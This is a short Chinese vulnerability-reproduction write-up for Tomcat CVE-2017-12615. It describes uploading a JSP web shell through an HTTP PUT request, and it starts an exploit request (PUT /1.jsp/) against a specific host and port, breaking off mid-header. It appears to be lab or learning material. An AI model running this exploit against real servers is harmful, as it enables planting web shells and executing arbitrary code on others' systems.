【漏洞复现】Tomcat 任意写入文件漏洞(CVE-2017-12615)
漏洞介绍
Tomcat 启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,文件中的代码被服务器执行。
poc
直接抓包,修改请求方式为 PUT,并且设置文件名,然后填充 shell(jsp shell即可)文件内容,发送成功后,服务器返回状态码201 ,说明存在该漏洞
exp
PUT /1.jsp/ HTTP/1.1
Host: 123.58.224.8:42237
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li